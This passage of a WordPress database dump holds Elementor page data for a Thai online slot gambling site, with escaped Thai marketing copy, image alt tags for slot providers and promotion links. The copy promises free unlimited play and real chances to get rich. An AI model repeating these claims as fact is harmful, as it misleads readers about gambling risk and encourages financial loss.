\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35<\\/b><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2083,280,'_wp_attachment_image_alt','yok789'),(2109,287,'_wp_attachment_image_alt','PG'),(2110,286,'_wp_attachment_image_alt','Microgaming'),(2111,291,'_wp_attachment_image_alt','JILI'),(2112,292,'_wp_attachment_image_alt','JOKER'),(2113,285,'_wp_attachment_image_alt','Slot xo'),(2114,284,'_wp_attachment_image_alt','pragmatic'),(2116,304,'_elementor_edit_mode','builder'),(2117,304,'_elementor_template_type','wp-page'),(2118,304,'_elementor_version','3.32.5'),(2119,304,'_elementor_pro_version','3.32.3'),(2120,304,'_wp_page_template','default'),(2121,304,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2122,304,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover